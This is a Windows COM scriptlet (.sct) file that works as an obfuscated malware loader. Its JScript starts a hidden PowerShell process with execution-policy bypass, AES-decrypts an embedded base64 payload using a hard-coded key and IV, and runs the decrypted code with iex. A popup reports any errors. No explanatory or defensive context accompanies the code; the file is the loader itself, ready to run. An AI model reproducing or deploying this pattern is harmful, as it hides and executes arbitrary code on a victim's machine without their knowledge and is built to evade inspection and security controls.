<?XML version="1.0"?>
<scriptlet>
<registration
    description="AESDecryptionExecution"
    progid="AESDecryptionExecution"
    version="1.0"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
    <script language="JScript">
        <![CDATA[
            try {
                var shell = new ActiveXObject("WScript.Shell");

                var psCommand = "powershell -nop -w hidden -ep bypass -Command \"";
                psCommand += "$encBytes = [Convert]::FromBase64String('+Of1hrzCZqV0c9+QIrGS5LgmhwZXMV7BGfnX/cGfbYLu4WSuGhI991YLenycnqhw683TtBMAkH9P8uUGBL1ZoJW9HbHur
Xjotpw6+ryZf0sdRZlaEZXTsfok08tElgA6g94AqgTl5fKxERfP6vr8URhROf9PPsBec3g5llH5PvnyPGaubhLYKWiI1TLccXrWwCO+Smqldv/QalDUwNK
4Kg==');";
                psCommand += "$aes = [System.Security.Cryptography.Aes]::Create();";
                psCommand += "$aes.Key = $([Convert]::FromBase64String('0RolkdpAwd3DeA+ZmzWro4xIpZ0//MCN9ZK4imzeTDE='));";
                psCommand += "$aes.IV = $([Convert]::FromBase64String('iXaoHvBeMPJ0VtL9+qj5TA=='));";
                psCommand += "$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC;";
                psCommand += "$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;";
                psCommand += "$decryptor = $aes.CreateDecryptor();";
                psCommand += "$decBytes = $decryptor.TransformFinalBlock($encBytes, 0, $encBytes.Length);";
                psCommand += "iex $([System.Text.Encoding]::UTF8.GetString($decBytes))\"";

                shell.Run(psCommand, 0, false);
            } catch (e) {
                var shell = new ActiveXObject("WScript.Shell");
                shell.Popup("Error: " + e.message, 0, "Execution Error", 16);
            }
        ]]>
    </script>
</registration>
</scriptlet>